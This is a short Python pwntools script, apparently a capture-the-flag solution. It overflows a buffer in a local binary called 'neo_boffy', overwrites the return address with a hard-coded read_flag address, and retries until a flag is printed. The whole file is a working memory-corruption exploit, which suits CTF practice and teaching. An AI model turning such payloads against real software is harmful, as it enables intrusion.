from pwn import *bin_path = "./neo_boffy"# Don't want pwntools writing to th

1. from pwn import *
2.  
3. bin_path = "./neo_boffy"
4.  
5. # Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
6. context(log_level="ERROR")
7.  
8. # Can't send NULLs, but can send empty strings
9. def cmdify(str): return str.split("\x00")
10.  
11.  
12. read_flag_offset = 0x8d0
13. read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak
14. loop_cap = 0x78 # This is where the loop caps
15.  
16. payload = ""
17. payload += "\x00" * 3 # ensure we can keep looping
18. payload += p32(read_flag)
19. payload += chr(loop_cap - 1 - len(payload))
20. payload = payload.rjust(0x79, "A")
21.  
22. # Keep trying until we find it
23. while True:
24. p = process([bin_path] + cmdify(payload))
25. out = p.recvall()
26. if "CTF{" in out:
27. print(out)
28. break